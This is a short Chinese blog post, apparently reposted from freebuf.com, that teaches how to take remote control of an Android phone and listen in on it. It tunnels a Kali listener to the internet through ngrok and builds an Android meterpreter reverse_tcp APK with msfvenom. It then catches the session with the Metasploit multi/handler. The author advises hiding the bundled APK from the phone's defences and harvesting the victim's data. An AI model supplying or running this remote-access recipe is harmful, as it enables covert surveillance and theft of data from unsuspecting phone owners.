kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ

内网转发的工具:http://www.ngrok.cc/ 注册一个账号 我们使用免费的隧道

图片[1]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科

图片[2]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科图片[3]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科图片[4]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科图片[5]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科

二、我下载的是kail 版本的 解压缩名字是sunny文件 执行命令

./sunny  clientid id这里是上面的id 直接复制过来替换就好 回车

图片[6]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科

图片[7]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科

三、我们已经完成内网的ip 映射到公网 我们接下来做攻击安卓手机的playload 我们另起一个终端 生成攻击apk

msfvenom -p android/meterpreter/reverse_tcp LHOST=你的域名在刚才ngrok上的二级域名 LPORT=映射的端口就是二级域名的端口 R > /root/apk.apk

图片[8]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科

四 、我们建立会话连接 msfconole 使用模块监听
1、使用监听模块

use exploit/multi/handler

2、选择Payload
set payload android/meterpreter/reverse_tcp
3、show options 查看参数设置

图片[9]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科注意点:我们这里设置的是你的攻击kail的ip 应为你已经映射到公网、所以不管对方在哪 我们都可以快速监听。前提是我们捆绑apk的时候要注意,不被手机系统所察觉。

拿到会话我们就可以开启远程 我的上图是已经监听了 我们开始想要我们数据:

图片[10]-kail是如何控制你的手机并且实现监听 – 作者:EdisonJJ-安全小百科

来源:freebuf.com 2020-11-25 10:53:13 by: EdisonJJ

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论